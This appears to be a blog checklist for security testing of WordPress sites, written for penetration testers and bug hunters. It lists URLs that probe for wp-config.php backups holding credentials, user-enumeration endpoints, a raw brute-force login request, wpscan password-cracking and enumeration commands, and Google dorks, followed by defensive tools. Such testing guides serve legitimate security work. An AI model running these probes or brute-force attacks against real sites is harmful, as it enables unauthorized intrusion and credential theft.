WordPress is a very popular blogging CMS (Content Management System) that is used to make e-commerce websites, blogging websites, and many more. According to a stat word press covers more than 30% of internet websites. It is well known that WordPress is very easy to install, easy to use, and easy to manage. This is the main reason behind the popularity of the CMS.
As the use is high the security risk and attacks come behind. However, still using WordPress is considered safe and secure as it is open source and maintained by lots of good developers, security researchers, and maintainers. Identified vulnerabilities are patched and mitigated at the earliest, the practice of prompt fixation helps in securing WordPress.
Today we are going to discuss about the possible flaws or possible areas of weakness in a website using WordPress. The below-discussed points need to be checked thoroughly before deploying a WordPress site. As penetration testers, we always want to find security flaws in our target scope and bug hunters also want to exploit a website using WordPress and report some cool vulnerabilities for rewards. Let’s discuss the checklist below.
WordPress Security Testing Checklist
- Check for access to wp-config.php file as the file contains very sensitive credentials for the database and API. Similarly, we should also check for backup files on the following extensions since there might be some cases that the file extension is changed due to various factors.
- http://target.com/.wp-config.php.swp
- http://target.com/wp-config.inc
- http://target.com/wp-config.old
- http://target.com/wp-config.txt
- http://target.com/wp-config.html
- http://target.com/wp-config.php.bak
- http://target.com/wp-config.php.dist
- http://target.com/wp-config.php.inc
- http://target.com/wp-config.php.old
- http://target.com/wp-config.php.save
- http://target.com/wp-config.php.swp
- http://target.com/wp-config.php.txt
- http://target.com/wp-config.php.zip
- http://target.com/wp-config.php.html
- http://target.com/wp-config.php~
- Check for directory Listing: Use fuzzing tools to check for directories and endpoints for possible directory listing. For fuzzing please use the following wordlist.
https://github.com/jhaddix/SecLists/blob/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt - Check for xmlrpc file enabled, the file usually resides at https://example.com/xmlrpc.php. Detailed exploitation can be found at https://hackerone.com/reports/752073
- Check for WordPress users on the website from the following endpoints.
- http://target.com/wp-json/wp/v2/users
- http://target.com/?rest_route=/wp/v2/users
- http://target.com/?author=1
- Once the list of users is collected, we can perform bruteforce attack using found usernames.
- POST /wp-login.php HTTP/1.1
Host: target.com
log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
- POST /wp-login.php HTTP/1.1
- Check whether the register feature is enabled, http://example.com/wp-login.php?action=register
- Check for installed plugins and their version.
– Use tools like wpscan
– We can also find the plugins and their version from the URL or change readme.txt to changelog.txt or readme.md https://target.com/wp-content/plugins/PLUGINNAME/readme.txt
– If you found outdated core / plugins / themes, find the exploit at https://wpscan.com or exploit-db.com
- Check for installed plugins and their version.
- Check for log files at http://target.com/wp-content/debug.log
- Check for the currently used PHP version on the website. This can be checked by using the Burp suite or by just checking response headers in our browser. Based on the version of PHP we can look for existing vulnerabilities in PHP.
- Check for all used themes and plugins or you can directly scan for vulnerabilities in them by using wpscan.
- Usually, the default users will be admin, in that we can brute force passwords using wpscan as below.
wpscan –url http://example.com –passwords rockyou.txt –usernames admin - If you cannot find wordpress username, do not worry we can still enumerate as below.
wpscan -u www.example.com –enumerate u - Check different released vulnerabilities of WordPress here
- Check for directory listing vulnerabilities, it is can be found using Google dorks such as.
Index:Index of /wp-admin
Index:Index of /wp-content/uploads
Tools For WordPress Security
Now, we will discuss a few of the tools that are used for scanning WordPress security vulnerabilities.
1. Wpscan
WPScan is a widely used open-source WordPress security scanner that is designed to perform black box testing on WordPress installations and websites powered by WordPress. It can be used to identify vulnerabilities and weaknesses in WordPress installations and can help site owners and administrators to improve the security posture of their WordPress-powered websites.
2. Sucuri Plugin
Sucuri is a very popular WordPress security plugin that offers a range of features like malware scanning, and file integrity monitoring, and it also protects our website from bad actor’s breach attempts. The firewall of sucuri is considered to be one of the most secure in the market. The tool also offers API to general users.
3. WordFence Plugin
Wordfence is another popular WordPress security plugin that includes features such as malware scanning, firewall protection, and brute force attack prevention. The product also offers API, that can be integrated with our own tool as well. The plugin provides security for themes, plugins, and WordPress core as well.
4. Nessus
Nessus is an application and network vulnerability assessment tool. This tool helps in finding underlying WordPress vulnerabilities. We need to configure our scan rules to web scan so that the tool can find the flaw in a WordPress site easily.
